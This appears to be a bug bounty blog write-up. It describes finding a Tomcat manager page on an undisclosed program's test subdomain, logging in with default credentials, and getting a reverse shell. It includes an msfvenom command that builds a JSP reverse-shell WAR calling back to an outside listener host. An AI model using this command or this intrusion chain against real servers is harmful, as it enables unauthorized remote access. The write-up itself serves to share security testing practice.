From TOMCAT to NT AUTHORITY\SYSTEM
So its been some time since I've done some Bug Bounty as I was busy working .
I wont be revealing the Program due to Privacy Issues …
I started my initial recon by doing some subdomain enumeration using KNOCKPY SUBLISTER etc..
And i got a subdomain named test.REDACTED.com there was nothing much to look for it returned a simple static HTML page , Then I did a Directory Scan using Dirsearch
“/manager” that's a TOMCAT LOGIN
Checking If it used default login was much more Satisfying
And Drum roll…………..
We have a LOGIN
Now its time to pop a shell I used my AWS server as a Listener
Generating a jsp payload can be achieved using this command
msfvenom -p java/jsp_shell_reverse_tcp LHOST=18.191.1**.* LPORT=4444 -f war > shell.war
**You can open your own custom port by adding it to the inbound rules section**
Now with the TCP handler
On Further enumeration I found that the Server is Microsoft Windows Server 2012 which was not looked after so often that last patch was on 2016 (poor guy)
And It was vulnerable to MS16–032 and I never tried to exploit it because it may piss off some of the DEVS.